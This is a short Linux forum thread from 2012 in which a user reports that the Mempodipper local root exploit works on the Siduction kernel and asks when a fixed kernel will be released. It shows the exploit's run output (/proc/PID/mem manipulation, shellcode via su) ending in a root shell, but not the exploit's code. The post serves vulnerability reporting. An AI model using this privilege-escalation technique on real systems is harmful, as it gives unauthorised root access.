Root privileges through memory access

Started by orinoco, 2012/01/23, 18:56:28


orinoco

Prompted by http://heise.de/-1419608, I tested the current Siduction kernel:

orinoco@jake:~/Temp/mempodipper$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4214/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f99.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),102(scanner),103(lpadmin),106(kvm),107(netdev),113(fuse),115(powerdev),120(vboxusers),1000(orinoco),1001(shutdown)
# whoami
root
# uname -a
Linux jake 3.2-1.towo.3-siduction-amd64 #1 SMP PREEMPT Fri Jan 13 11:16:56 UTC 2012 x86_64 GNU/Linux


When can a fixed kernel be expected?

P.S. I hope this info is in the right subforum.

towo

I don't go to Carnival, I just lend out my face sometimes.